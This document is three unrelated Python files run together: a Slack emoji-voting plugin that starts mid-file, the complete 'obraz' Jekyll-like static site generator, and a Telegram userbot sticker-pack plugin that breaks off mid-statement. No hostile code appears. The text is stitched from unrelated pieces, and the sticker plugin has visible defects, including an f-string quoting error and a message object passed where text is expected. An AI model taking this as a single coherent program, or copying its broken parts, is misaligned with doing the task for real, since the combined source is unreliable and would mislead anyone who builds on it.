allow one vote per person on boolean votes name = "emoji-vote" plugin_name = "slack" input_schema = { "type": "object", "properties": { "title": {"type": "string"}, "options": { "type": "array", "items": {"type": "string"}, "description": "options to use for choice selection. ignored for 'boolean' poll type", }, "details": {"type": "string"}, "poll_type": {"type": "string", "enum": ["boolean", "choice"]}, "channel": { "type": "string", "description": "channel to post the vote in", }, "users": { "type": "array", "items": {"type": "string"}, "description": "users to participate in vote in a multi-person message thread. ignored if channel is provided.", }, "emoji_family": { "type": "string", "enum": ["hearts", "flowers", "numbers"], "description": "emoji family to use for choice selection. 
ignored for 'boolean' poll type", }, }, "required": ["title", "poll_type"], } class Meta: proxy = True def start(self, parameters) -> None: text = construct_message_header(parameters["title"], parameters.get("details")) self.state.set("message_header", text) poll_type = parameters["poll_type"] options = [Bool.YES, Bool.NO] if poll_type == "boolean" else parameters["options"] if options is None: raise ValidationError("Options are required for non-boolean votes") maybe_channel = parameters.get("channel") maybe_users = parameters.get("users") if maybe_channel is None and (maybe_users is None or len(maybe_users) == 0): raise ValidationError("users or channel are required") if poll_type == "boolean": option_emoji_map = {"+1": Bool.YES, "-1": Bool.NO} else: family = parameters.get("emoji_family", "numbers") emojis = EMOJI_MAP[family] if len(emojis) < len(options): raise PluginErrorInternal("There are more voting options than possible emojis") if family != "numbers": random.shuffle(emojis) emojis = emojis[: len(options)] option_emoji_map = dict(zip(emojis, options)) for (k, v) in option_emoji_map.items(): text += f"\n> :{k}: {v}" self.state.set("option_emoji_map", option_emoji_map) response = self.plugin_inst.post_message({"channel": maybe_channel, "users": maybe_users, "text": text}) ts = response["ts"] channel = response["channel"] permalink_resp = self.plugin_inst.method( { "method_name": "chat.getPermalink", "channel": channel, "message_ts": ts, } ) # Add 1 initial reaction for each emoji type for emoji in option_emoji_map.keys(): self.plugin_inst.method( {"method_name": "reactions.add", "channel": channel, "timestamp": ts, "name": emoji} ) self.state.set("poll_type", parameters["poll_type"]) self.outcome = { "url": permalink_resp["permalink"], "channel": channel, "message_ts": ts, "votes": dict([(k, {"users": [], "count": 0}) for k in options]), } self.status = ProcessStatus.PENDING.value self.save() def receive_webhook(self, request): json_data = json.loads(request.body) data = json_data["event"] evt_type = data["type"] if not evt_type.startswith("reaction_"): return ts = data["item"]["ts"] if ts != self.outcome["message_ts"]: return reaction = normalize_reaction(data["reaction"]) option_emoji_map = self.state.get("option_emoji_map") if reaction not in option_emoji_map: return option = option_emoji_map[reaction] logger.debug(f"Processing reaction '{reaction}' as a vote for '{option}'") # Get the voting message post and update all the vote counts based on the emojis currently present ts = self.outcome["message_ts"] response = self.plugin_inst.method( { "method_name": "conversations.history", "channel": self.outcome["channel"], "latest": ts, "oldest": ts, "inclusive": True, "limit": 1, } ) self.update_outcome_from_reaction_list(response["messages"][0].get("reactions", [])) def close(self): # Edit content of the post to mark it as "closed." option_emoji_map = self.state.get("option_emoji_map") text = self.state.get("message_header") if self.state.get("poll_type") == "boolean": yes = self.outcome["votes"][Bool.YES]["count"] no = self.outcome["votes"][Bool.NO]["count"] text += f"\nFinal vote count: {yes} for and {no} against." 
else: for (k, v) in option_emoji_map.items(): count = self.outcome["votes"][v]["count"] text += f"\n> :{k}: {v} ({count})" self.plugin_inst.method( { "method_name": "chat.update", "channel": self.outcome["channel"], "ts": self.outcome["message_ts"], "text": text, } ) self.status = ProcessStatus.COMPLETED.value self.save() def update_outcome_from_reaction_list(self, reaction_list): self.outcome["votes"] = reactions_to_dict( reaction_list, self.state.get("option_emoji_map"), excluded_users=[self.plugin_inst.config["bot_user_id"]] ) self.save() def construct_message_header(title, details=None): text = f"*{title}*\n" if details: text += f"{details}\n" return text def reactions_to_dict(reaction_list, emoji_to_option, excluded_users=[]): """Convert list of reactions from Slack API into a dictionary of option votes""" votes = {} for r in reaction_list: emoji = normalize_reaction(r.pop("name")) option = emoji_to_option.get(emoji) if not option: continue # remove excluded users from list of reactions user_list = set(r["users"]) user_list.difference_update(set(excluded_users)) user_list = list(user_list) user_list.sort() if votes.get(option): # we already have some users listed (because of normalized reactions) uniq_users = list(set(votes[option]["users"] + user_list)) uniq_users.sort() votes[option] = {"users": uniq_users, "count": len(uniq_users)} else: votes[option] = {"users": user_list, "count": len(user_list)} # add zeros for options that don't have any reactions for v in emoji_to_option.values(): if votes.get(v) is None: votes[v] = {"users": [], "count": 0} return votes def normalize_reaction(reaction: str): if reaction.startswith("+1::skin-tone-"): return "+1" if reaction.startswith("-1::skin-tone-"): return "-1" return reaction
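For orientation, a minimal sketch of parameter dictionaries that match the emoji-vote input_schema above; the channel and user IDs are placeholders (the channel ID reuses the one from the curl examples), and how a driver actually creates and starts the process instance is outside this plugin.

# Hypothetical parameter sets only; the shapes follow the SlackEmojiVote input_schema above.
boolean_vote = {
    "title": "Adopt the new proposal?",
    "details": "Vote closes tomorrow.",
    "poll_type": "boolean",            # +1 / -1 reactions map to yes / no
    "channel": "C0177HZTV7X",          # post the vote in a channel...
}

choice_vote = {
    "title": "Pick a meeting day",
    "poll_type": "choice",
    "options": ["Monday", "Wednesday", "Friday"],
    "emoji_family": "numbers",         # :one:, :two:, ... map onto the options in order
    "users": ["U0123ABC", "U0456DEF"], # ...or open a multi-person message instead of a channel
}

# process.start(boolean_vote)  # `process` is an assumed SlackEmojiVote instance created by the driver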
# -*- coding: utf-8 -*- # Copyright (c) 2012-2022 Andrey Vlasovskikh # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. """Static blog-aware site generator in Python mostly compatible with Jekyll. Usage: obraz (build | serve | new PATH) [options] obraz -h|--help Commands: build Build your site. serve Serve your site locally. new Create a new Obraz site scaffold in PATH. Options: -s --source=DIR Source directory. -d --destination=DIR Destination directory. --force Force overwriting the destination directory. --safe Disable custom plugins. -w --watch Watch for changes and rebuild. -D --drafts Render posts in the _drafts folder. -H --host=HOSTNAME Listen at the given hostname. -P --port=PORT Listen at the given port. -b --baseurl=URL Serve the website from the given base URL. -q --quiet Be quiet. -t --trace Display traceback when an error occurs. -v --version Show version. -h --help Show help message. For documentation see <https://obraz.pirx.ru/>. 
""" import contextlib import os import re import shutil import sys import traceback from datetime import datetime from glob import glob from http.server import SimpleHTTPRequestHandler, HTTPServer from io import BytesIO from threading import Thread from time import sleep from typing import ( BinaryIO, Any, Callable, Iterable, Sequence, TypeVar, Optional, TypedDict, Union, cast, ) from urllib.request import pathname2url, url2pathname import yaml from docopt import docopt from jinja2 import Environment, FileSystemLoader from markdown import markdown __all__ = [ "file_filter", "generator", "loader", "processor", "template_filter", "template_renderer", ] PAGE_ENCODING = "UTF-8" class ConfigBase(TypedDict): source: str destination: str include: list[str] exclude: list[str] exclude_patterns: list[str] full_build_patterns: list[str] host: str port: str baseurl: str permalink: str class Config(ConfigBase, total=False): time: datetime drafts: bool force: bool trace: bool class File(TypedDict): url: str path: str class TemplateBase(TypedDict): content: str class Template(TemplateBase, total=False): layout: str class PageBase(Template): url: str class Page(PageBase, total=False): path: str published: bool raw_content: bool class PostBase(Page): date: datetime id: str class Post(PostBase, total=False): next: "Post" # type: ignore previous: "Post" # type: ignore tags: list[str] class SiteContents(TypedDict, total=False): files: list[File] pages: list[Page] posts: list[Post] tags: dict[str, list[Post]] class Site(SiteContents, Config): pass DEFAULT_CONFIG: ConfigBase = { "source": "./", "destination": "./_site", "include": [".htaccess"], "exclude": [], "exclude_patterns": [r"^[\.#].*", r".*~$", r".*\.sw[op]$"], "full_build_patterns": [ r"_layouts", r"_includes", ], "host": "localhost", "port": "8000", "baseurl": "", "permalink": "/{year}/{month}/{day}/{title}.html", } _quiet = False _loaders: list[Callable[[str, Config], Optional[SiteContents]]] = [] _processors: list[Callable[[Site], None]] = [] _render_string = lambda s, _context, _config: s _file_filters: dict[str, Callable[[str, Config], str]] = {} _template_filters: dict[str, Callable[[str, Config], str]] = {} _T = TypeVar("_T") def file_filter(extensions: Iterable[str]) -> Any: """Register a page content filter for file extensions.""" def wrapper(f: Callable[[str, Config], str]) -> Callable[[str, Config], str]: for ext in extensions: _file_filters[ext] = f return f return wrapper def template_filter(name: str) -> Any: """Register a template filter.""" def wrapper(f: Callable[[str, Config], str]) -> Callable[[str, Config], str]: _template_filters[name] = f return f return wrapper def template_renderer(f: Callable[[str, dict[str, Any], Config], str]) -> Any: """Set a custom template renderer.""" global _render_string _render_string = f return f def loader(f: Callable[[str, Config], Optional[SiteContents]]) -> Any: """Register a site source content loader.""" _loaders.insert(0, f) return f def processor(f: Callable[[Site], None]) -> Any: """Register a site content processor.""" _processors.insert(0, f) return f def generator(f: Callable[[Site], None]) -> Any: """Register a destination files generator for the site.""" _processors.append(f) return f def fallback_loader(f: Callable[[str, Config], Optional[SiteContents]]) -> Any: _loaders.append(f) return f def load_yaml_mapping(path: str) -> dict: try: with open(path, "rb") as fd: mapping = yaml.safe_load(fd) return mapping if mapping else {} except FileNotFoundError: return {} def merge(x1: _T, x2: _T) 
-> _T: if isinstance(x1, dict) and isinstance(x2, dict): res_dict = x1.copy() for k, v in x2.items(): if k in res_dict: res_dict[k] = merge(res_dict[k], v) else: res_dict[k] = v return cast(_T, res_dict) elif isinstance(x1, list) and isinstance(x2, list): res_list = x1.copy() res_list.extend(x2) return cast(_T, res_list) elif x1 == x2: return x1 else: raise ValueError(f"Cannot merge '{x1!r}' and '{x2!r}'") def all_source_files(source: str, destination: str) -> Iterable[str]: dst_base, dst_name = os.path.split(os.path.realpath(destination)) for source, dirs, files in os.walk(source): if os.path.realpath(source) == dst_base and dst_name in dirs: dirs.remove(dst_name) for filename in files: yield os.path.join(source, filename) def changed_files( source: str, destination: str, config: Config, poll_interval: int = 1 ) -> Iterable[list[str]]: times: dict[str, float] = {} while True: changed = [] for path in all_source_files(source, destination): rel_path = os.path.relpath(path, source) if not is_file_visible(rel_path, config): continue new = os.stat(path).st_mtime old = times.get(path) if not old or new > old: times[path] = new changed.append(path) if changed: yield changed sleep(poll_interval) def is_file_visible(path: str, config: Config) -> bool: """Check file name visibility according to site settings.""" parts = path.split(os.path.sep) exclude = config.get("exclude", []) exclude_patterns = config.get("exclude_patterns", []) if path in config.get("include", []): return True elif any(re.match(pattern, part) for pattern in exclude_patterns for part in parts): return False elif any(path.startswith(s) for s in exclude): return False else: return True def is_underscored(path: str) -> bool: parts = path.split(os.path.sep) return any(part.startswith("_") for part in parts) def path2url(path: str) -> str: m = re.match(r"(.*)[/\\]index.html?$", path) if m: path = m.group(1) + os.path.sep path = os.path.sep + path return pathname2url(path) def url2path(url: str) -> str: if url.endswith("/"): url += "index.html" return url2pathname(url).lstrip(os.path.sep) def make_dirs(path: str) -> None: with contextlib.suppress(FileExistsError): os.makedirs(path) def remove(path: str) -> None: with contextlib.suppress(FileExistsError): if os.path.isdir(path): shutil.rmtree(path) else: os.remove(path) def info(message: str) -> None: if not _quiet: log(message) def exception(e: BaseException, trace: bool) -> None: if trace: traceback.print_tb(e.__traceback__) log(f"Error: {e}") def log(message: str) -> None: sys.stderr.write(f"{message}\n") sys.stderr.flush() def progress(msg: str, xs: Sequence[_T]) -> Iterable[_T]: if _quiet: for x in xs: yield x else: size = len(xs) for i, x in enumerate(xs, 1): yield x s = f"{msg}: {int(i * 100 / size)}% ({i}/{size})" sys.stderr.write("\r" + s) sys.stderr.write("\n") def file_suffix(path: str) -> str: _, ext = os.path.splitext(path) return ext def object_name(f: Any) -> str: if f.__doc__: lines = f.__doc__.splitlines() for line in lines: line = line.strip() if line: return line.rstrip(".") return f.__name__ @template_filter("markdownify") @file_filter([".md", ".markdown"]) def markdown_filter(s: str, config: Config) -> str: return markdown(s) @fallback_loader def load_file(path: str, config: Config) -> Optional[SiteContents]: if not is_file_visible(path, config) or is_underscored(path): return None file: File = {"url": path2url(path), "path": path} return { "files": [file], } @template_renderer def jinja2_render_string(string: str, context: dict[str, Any], config: Config) -> str: 
includes = os.path.join(config["source"], "_includes") env = Environment(loader=FileSystemLoader(includes)) for name, f in _template_filters.items(): env.filters[name] = lambda s: f(s, config) t = env.from_string(string) return t.render(**context) def read_template(path: str) -> Optional[Template]: with open(path, "rb") as fd: if fd.read(3) != b"---": return None lines = [] while True: line = fd.readline() if re.match(b"^---\r?\n", line): break elif line == b"": return None lines.append(line) front_matter = BytesIO(b"".join(lines)) front_matter.name = path page = yaml.safe_load(front_matter) if not page: page = {} content = fd.read().decode(PAGE_ENCODING) page["content"] = content return page @loader def load_page(path: str, config: Config) -> Optional[SiteContents]: if not is_file_visible(path, config) or is_underscored(path): return None name, suffix = os.path.splitext(path) if suffix in _file_filters: dst = f"{name}.html" else: dst = path page = cast(Page, read_template(os.path.join(config["source"], path))) if not page: return None page["url"] = path2url(dst) page["path"] = path return {"pages": [page]} def read_post( path: str, date: datetime, title: str, config: Config ) -> Optional[SiteContents]: post = cast(Post, read_template(os.path.join(config["source"], path))) if not post: return None if "date" in post: date = post["date"] url_vars = { "year": f"{date.year:04}", "month": f"{date.month:02}", "day": f"{date.day:02}", "title": title, } post["url"] = pathname2url(config["permalink"].format(**url_vars)) post["path"] = path if "date" not in post: date_str = "{year}-{month}-{day}".format(**url_vars) post["date"] = datetime.strptime(date_str, "%Y-%m-%d") post["id"] = "/{year}/{month}/{day}/{title}".format(**url_vars) return { "posts": [post], "tags": dict((tag, [post]) for tag in post.get("tags", [])), } @loader def load_post(path: str, config: Config) -> Optional[SiteContents]: post_re = re.compile( r"(?P<year>\d{4})-(?P<month>\d{2})-(?P<day>\d{2})-" r"(?P<title>.+)" ) parts = path.split(os.path.sep) if "_posts" not in parts: return None if not is_file_visible(path, config): return None name, _ = os.path.splitext(os.path.basename(path)) m = post_re.match(name) if not m: return None date = datetime.strptime("{year}-{month}-{day}".format(**m.groupdict()), "%Y-%m-%d") return read_post(path, date, m.group("title"), config) @loader def load_draft(path: str, config: Config) -> Optional[SiteContents]: if not config.get("drafts"): return None if "_drafts" not in path.split(os.path.sep): return None if not is_file_visible(path, config): return None title, _ = os.path.splitext(os.path.basename(path)) return read_post(path, config.get("time", datetime.utcnow()), title, config) def render_layout(content: str, template: Template, site: Site) -> str: name = template.get("layout", "nil") if name == "nil": return content layout_file = os.path.join(site["source"], "_layouts", f"{name}.html") layout = read_template(layout_file) if not layout: raise Exception(f"Cannot load template: '{layout_file}'") layout_copy = cast(dict, layout.copy()) page_copy = cast(dict, template.copy()) page_copy.pop("layout", None) page_copy.pop("content", None) layout_copy.update(page_copy) layout = cast(Template, layout_copy) context = { "site": site, "page": layout, "content": content, } content = _render_string(layout["content"], context, site) return render_layout(content, layout, site) def render_page(page: Page, site: Site) -> str: context = { "site": site, "page": page, } content = page["content"] if not 
page.get("raw_content", False): content = _render_string(content, context, site) f = _file_filters.get(file_suffix(page.get("path", ""))) if f: content = f(content, site) page["content"] = content return render_layout(content, page, site) @processor def process_posts(site: Site) -> None: """Sort and interlink posts.""" posts: list[Post] = site.setdefault("posts", []) posts.sort(key=lambda p: p["date"], reverse=True) n = len(posts) for i, post in enumerate(posts): if i < n - 1: post["next"] = posts[i + 1] if i > 0: post["previous"] = posts[i - 1] def generate_page(page: Page, site: Site) -> None: if not page.get("published", True): return url = page["url"] dst = os.path.join(site["destination"], url2path(url)) make_dirs(os.path.dirname(dst)) with open(dst, "wb") as fd: fd.truncate() try: rendered = render_page(page, site) except Exception as e: raise Exception(f"Cannot render '{page.get('path')}': {e}") fd.write(rendered.encode(PAGE_ENCODING)) @generator def generate_pages(site: Site) -> None: """Generate pages with YAML front matter.""" posts = cast(list[Page], site.get("posts", [])) pages = site.get("pages", []) for page in progress("Generating pages", posts + pages): generate_page(page, site) @generator def generate_files(site: Site) -> None: """Copy static files.""" for file_dict in site.get("files", []): src = os.path.join(site["source"], file_dict["path"]) dst = os.path.join(site["destination"], url2path(file_dict["url"])) make_dirs(os.path.dirname(dst)) shutil.copy(src, dst) def load_plugins(source: str) -> None: plugins = sorted(glob(os.path.join(source, "_plugins", "*.py"))) n = 0 for plugin in plugins: with open(plugin, "rb") as fd: code = fd.read() exec(compile(code, plugin, "exec"), {}) n += 1 if n > 0: info(f"Loaded {n} plugins") def build(config: Config) -> None: site = load_site(config) generate_site(site) def build_delta(paths: Iterable[str], config: Config) -> None: site = load_site_files(paths, config) generate_site(site, clean=False) def load_site_files(paths: Iterable[str], config: Config) -> Site: source = config["source"] info("Loading source files...") site = cast(SiteContents, config.copy()) n = 0 for path in paths: rel_path = os.path.relpath(path, source) for f in _loaders: data = f(rel_path, config) if data: n += 1 site = merge(site, data) break info(f"Loaded {n} files") return cast(Site, site) def load_site(config: Config) -> Site: paths = all_source_files(config["source"], config["destination"]) return load_site_files(paths, config) def generate_site(site: Site, clean: bool = True) -> None: destination = site["destination"] marker = os.path.join(destination, ".obraz_destination") write_denied = os.path.exists(destination) and not os.path.exists(marker) if write_denied and not site.get("force"): raise Exception( f"Use --force to overwrite the contents " f"of '{destination}' not marked as destination " f"directory yet" ) make_dirs(destination) if clean: for name in os.listdir(destination): remove(os.path.join(destination, name)) with open(marker, "wb"): pass for f in _processors: msg = object_name(f) info(f"{msg}...") f(site) info("Site generated successfully") def make_server(config: Config) -> HTTPServer: host = config["host"] port = int(config["port"]) baseurl = config["baseurl"] class Handler(SimpleHTTPRequestHandler): def send_head(self) -> Union[BytesIO, BinaryIO, None]: if not self.path.startswith(baseurl): self.send_error(404, "File not found") return None self.path = self.path[len(baseurl) :] if not self.path.startswith("/"): self.path = "/" + self.path 
return SimpleHTTPRequestHandler.send_head(self) return HTTPServer((host, port), Handler) def serve(config: Config) -> None: build(config) server = make_server(config) os.chdir(config["destination"]) log_serving(config) server.serve_forever() def watch(config: Config) -> None: source = os.path.abspath(config["source"]) destination = os.path.abspath(config["destination"]) initial_dir = os.getcwd() serving = False server = make_server(config) for changed in changed_files(source, destination, config): if serving: info(f"Changed {len(changed)} files, regenerating...") server.shutdown() os.chdir(initial_dir) try: if full_build_required(changed, config) or not serving: build(config) else: build_delta(changed, config) except KeyboardInterrupt: raise except Exception as e: exception(e, bool(config.get("trace"))) os.chdir(destination) log_serving(config) thread = Thread(target=server.serve_forever) thread.daemon = True thread.start() if not serving: serving = True def log_serving(config: Config) -> None: url = "http://{host}:{port}{baseurl}".format(**config) if not url.endswith("/"): url += "/" info(f"Serving at {url}") def full_build_required(changed_paths: Iterable[str], config: Config) -> bool: patterns = config.get("full_build_patterns", []) source = os.path.abspath(config["source"]) for path in changed_paths: parts = os.path.relpath(path, source).split(os.path.sep) if any(re.match(pattern, part) for pattern in patterns for part in parts): return True return False def new_site(path: str) -> None: if os.path.exists(path) and os.listdir(path): raise Exception(f"Path '{path}' exists and is not empty") dev_source = os.path.join(os.path.dirname(__file__), "scaffold") if os.path.exists(dev_source): source = dev_source else: source = os.path.join(sys.prefix, "obraz/scaffold") shutil.copytree(source, path) info(f"New Obraz site installed in '{path}'") def obraz(argv: list[str]) -> None: opts = docopt(__doc__ or "", argv=argv, version="0.9.5") global _quiet _quiet = opts["--quiet"] try: if opts["new"]: new_site(opts["PATH"]) return copy = cast(dict, DEFAULT_CONFIG.copy()) source = opts["--source"] if opts["--source"] else "./" config_file = os.path.join(source, "_config.yml") copy.update(load_yaml_mapping(config_file)) copy["time"] = datetime.utcnow() for k, v in opts.items(): if k.startswith("--") and v: copy[k[2:]] = v config = cast(Config, copy) info(f'Source: {os.path.abspath(config["source"])}') info(f'Destination: {os.path.abspath(config["destination"])}') if not config.get("safe"): load_plugins(source) if opts["build"]: build(config) elif opts["serve"]: if opts["--watch"]: watch(config) else: serve(config) except KeyboardInterrupt: info("Interrupted") except BaseException as e: exception(e, opts["--trace"]) raise def main() -> None: sys.modules["obraz"] = sys.modules[__name__] try: obraz(sys.argv[1:]) except Exception: sys.exit(1) if __name__ == "__main__": main()
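As a quick illustration of the plugin hooks exported above (template_filter, processor, and friends), a minimal sketch of a custom plugin that obraz could pick up from _plugins/; the filter name and the post_count key are invented for the example.

# _plugins/shout.py -- hypothetical example built on the hooks defined above
import obraz


@obraz.template_filter("shout")
def shout(s, config):
    """Usable in templates as {{ page.title | shout }}."""
    return s.upper()


@obraz.processor
def count_posts(site):
    """Expose the number of loaded posts to templates as site.post_count."""
    site["post_count"] = len(site.get("posts", []))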
"""Make / Download Telegram Sticker Packs without installing Third Party applications Available Commands: .kang [Optional Emoji] .packinfo .getsticker""" from telethon import events from io import BytesIO from PIL import Image import asyncio import datetime from collections import defaultdict import math import os import requests import zipfile from telethon.errors.rpcerrorlist import StickersetInvalidError from telethon.errors import MessageNotModifiedError from telethon.tl.functions.account import UpdateNotifySettingsRequest from telethon.tl.functions.messages import GetStickerSetRequest from telethon.tl.types import ( DocumentAttributeFilename, DocumentAttributeSticker, InputMediaUploadedDocument, InputPeerNotifySettings, InputStickerSetID, InputStickerSetShortName, MessageMediaPhoto ) from userbot.utils import admin_cmd from userbot import ALIVE_NAME DEFAULTUSER = str(ALIVE_NAME) if ALIVE_NAME else "Who is this" FILLED_UP_DADDY = "Invalid pack selected." @borg.on(admin_cmd(pattern="kang ?(.*)")) async def _(event): if event.fwd_from: return if not event.is_reply: await event.edit("Reply to a photo to add to my personal sticker pack.") return reply_message = await event.get_reply_message() sticker_emoji = "😎" input_str = event.pattern_match.group(1) if input_str: sticker_emoji = input_str user = await bot.get_me() if not user.username: user.username = user.id pack = 1 userid = event.from_id #packname = f"FRIDAY PACK" #packshortname = f"FRIDAY_{userid}_ns" # format: Uni_Borg_userid if userid == 1263617196: packname = f"@StarkGang Packs 🎭" packshortname = "StarkGangPack" else: packname = f"{user.username}'s {pack}" packshortname = f"FRIDAY_{userid}_Pack" await event.edit("`Wew ! I Love That Sticker ! Mind If i Kang It ?`") is_a_s = is_it_animated_sticker(reply_message) file_ext_ns_ion = "@FRIDAYOT.png" file = await borg.download_file(reply_message.media) uploaded_sticker = None if is_a_s: file_ext_ns_ion = "AnimatedSticker.tgs" uploaded_sticker = await borg.upload_file(file, file_name=file_ext_ns_ion) if userid == 813878981: packname = f"StarkGang Ka Pack" packshortname = "StarkGangisgreat" else: packname = f"{user.username}'s {pack}" packshortname = f"FRIDAY_{userid}" # format: Uni_Borg_userid elif not is_message_image(reply_message): await event.edit("Invalid message type") return else: with BytesIO(file) as mem_file, BytesIO() as sticker: resize_image(mem_file, sticker) sticker.seek(0) uploaded_sticker = await borg.upload_file(sticker, file_name=file_ext_ns_ion) await event.edit("Packing To Your Pack ! Please Wait!") async with borg.conversation("@Stickers") as bot_conv: now = datetime.datetime.now() dt = now + datetime.timedelta(minutes=1) if not await stickerset_exists(bot_conv, packshortname): await event.edit("`Creating a new pack!`") await silently_send_message(bot_conv, "/cancel") if is_a_s: response = await silently_send_message(bot_conv, "/newanimated") else: response = await silently_send_message(bot_conv, "/newpack") if "Yay!" not in response.text: await event.edit(f"**Error**! @Stickers replied: {response.text}") return response = await silently_send_message(bot_conv, packname) if not response.text.startswith("Alright!"): await event.edit(f"**Error**! @Stickers replied: {response.text}") return w = await bot_conv.send_file( file=uploaded_sticker, allow_cache=False, force_document=True ) response = await bot_conv.get_response() if "Sorry" in response.text: await event.edit(f"**Error**! 
@Stickers replied: {response.text}") return await silently_send_message(bot_conv, sticker_emoji) await silently_send_message(bot_conv, "/publish") response = await silently_send_message(bot_conv, f"<{packname}>") await silently_send_message(bot_conv, "/skip") response = await silently_send_message(bot_conv, packshortname) if response.text == "Sorry, this short name is already taken.": await event.edit(f"**Error**! @Stickers replied: {response.text}") return else: await silently_send_message(bot_conv, "/cancel") await silently_send_message(bot_conv, "/addsticker") await silently_send_message(bot_conv, packshortname) await bot_conv.send_file( file=uploaded_sticker, allow_cache=False, force_document=True ) response = await bot_conv.get_response() if response.text == FILLED_UP_DADDY: while response.text == FILLED_UP_DADDY: pack += 1 prevv = int(pack) - 1 packname = f"{user.username}'s {pack}" packshortname = f"Vol_{pack}_with_{user.username}" #if userid == 948408212: # packname = f"{user.username}'s {pack}" # packshortname = "Vol._{pack}_FRIDAY_ke_locker_me" # else: # packname = f"Vol._{pack}_FRIDAY{userid}" #packshortname = f"Vol._{pack}_Friday_{userid}_ns" if not await stickerset_exists(bot_conv, packshortname): await event.edit("**Pack No. **" + str(prevv) + "** full! Making a new Pack, Vol. **" + str(pack)) if is_a_s: response = await silently_send_message(bot_conv, "/newanimated") else: response = await silently_send_message(bot_conv, "/newpack") if "Yay!" not in response.text: await event.edit(f"**Error**! @Stickers replied: {response.text}") return response = await silently_send_message(bot_conv, packname) if not response.text.startswith("Alright!"): await event.edit(f"**Error**! @Stickers replied: {response.text}") return w = await bot_conv.send_file( file=uploaded_sticker, allow_cache=False, force_document=True ) response = await bot_conv.get_response() if "Sorry" in response.text: await event.edit(f"**Error**! @Stickers replied: {response.text}") return await silently_send_message(bot_conv, sticker_emoji) await silently_send_message(bot_conv, "/publish") response = await silently_send_message(bot_conv, f"<{packname}>") await silently_send_message(bot_conv, "/skip") response = await silently_send_message(bot_conv, packshortname) if response.text == "Sorry, this short name is already taken.": await event.edit(f"**Error**! @Stickers replied: {response.text}") return else: await event.edit("Pack No. " + str(prevv) + " full! Switching to Vol. " + str(pack)) await silently_send_message(bot_conv, "/addsticker") await silently_send_message(bot_conv, packshortname) await bot_conv.send_file( file=uploaded_sticker, allow_cache=False, force_document=True ) response = await bot_conv.get_response() if "Sorry" in response.text: await event.edit(f"**Error**! @Stickers replied: {response.text}") return await silently_send_message(bot_conv, sticker_emoji) await silently_send_message(bot_conv, "/done") else: if "Sorry" in response.text: await event.edit(f"**Error**! 
@Stickers replied: {response.text}") return await silently_send_message(bot_conv, response) await silently_send_message(bot_conv, sticker_emoji) await silently_send_message(bot_conv, "/done") await event.edit(f"**Sticker Has Been Kanged Successfully And Can Be Found** [Here](t.me/addstickers/{packshortname})") @borg.on(admin_cmd(pattern="packinfo")) async def _(event): if event.fwd_from: return if not event.is_reply: await event.edit("Reply to any sticker to get its pack info.") return rep_msg = await event.get_reply_message() if not rep_msg.document: await event.edit("Reply to any sticker to get its pack info.") return stickerset_attr_s = rep_msg.document.attributes stickerset_attr = find_instance(stickerset_attr_s, DocumentAttributeSticker) if not stickerset_attr.stickerset: await event.edit("Sticker does not belong to a pack.") return get_stickerset = await borg( GetStickerSetRequest( InputStickerSetID( id=stickerset_attr.stickerset.id, access_hash=stickerset_attr.stickerset.access_hash ) ) ) pack_emojis = [] for document_sticker in get_stickerset.packs: if document_sticker.emoticon not in pack_emojis: pack_emojis.append(document_sticker.emoticon) await event.edit(f"**Sticker Title:** `{get_stickerset.set.title}\n`" f"**Sticker Short Name:** `{get_stickerset.set.short_name}`\n" f"**Official:** `{get_stickerset.set.official}`\n" f"**Archived:** `{get_stickerset.set.archived}`\n" f"**Stickers In Pack:** `{len(get_stickerset.packs)}`\n" f"**Emojis In Pack:** {" ".join(pack_emojis)}") @borg.on(admin_cmd(pattern="getsticker ?(.*)")) async def _(event): if event.fwd_from: return input_str = event.pattern_match.group(1) if not os.path.isdir(Config.TMP_DOWNLOAD_DIRECTORY): os.makedirs(Config.TMP_DOWNLOAD_DIRECTORY) if event.reply_to_msg_id: reply_message = await event.get_reply_message() # https://gist.github.com/udf/e4e3dbb2e831c8b580d8fddd312714f7 if not reply_message.sticker: return sticker = reply_message.sticker sticker_attrib = find_instance(sticker.attributes, DocumentAttributeSticker) if not sticker_attrib.stickerset: await event.reply("This sticker is not part of a pack") return is_a_s = is_it_animated_sticker(reply_message) file_ext_ns_ion = "webp" file_caption = "https://t.me/RoseSupport/33801" if is_a_s: file_ext_ns_ion = "tgs" file_caption = "Forward the ZIP file to @AnimatedStickersRoBot to get Lottie JSON containing the vector information." 
sticker_set = await borg(GetStickerSetRequest(sticker_attrib.stickerset)) pack_file = os.path.join(Config.TMP_DOWNLOAD_DIRECTORY, sticker_set.set.short_name, "pack.txt") if os.path.isfile(pack_file): os.remove(pack_file) # Sticker emojis are retrieved as a mapping of # <emoji>: <list of document ids that have this emoji> # So we need to build a mapping of <document id>: <list of emoji> # Thanks, Durov emojis = defaultdict(str) for pack in sticker_set.packs: for document_id in pack.documents: emojis[document_id] += pack.emoticon async def download(sticker, emojis, path, file): await borg.download_media(sticker, file=os.path.join(path, file)) with open(pack_file, "a") as f: f.write(f"{{'image_file': '{file}','emojis':{emojis[sticker.id]}}},") pending_tasks = [ asyncio.ensure_future( download(document, emojis, Config.TMP_DOWNLOAD_DIRECTORY + sticker_set.set.short_name, f"{i:03d}.{file_ext_ns_ion}") ) for i, document in enumerate(sticker_set.documents) ] await event.edit(f"Downloading {sticker_set.set.count} sticker(s) to .{Config.TMP_DOWNLOAD_DIRECTORY}{sticker_set.set.short_name}...") num_tasks = len(pending_tasks) while 1: done, pending_tasks = await asyncio.wait(pending_tasks, timeout=2.5, return_when=asyncio.FIRST_COMPLETED) try: await event.edit( f"Downloaded {num_tasks - len(pending_tasks)}/{sticker_set.set.count}") except MessageNotModifiedError: pass if not pending_tasks: break await 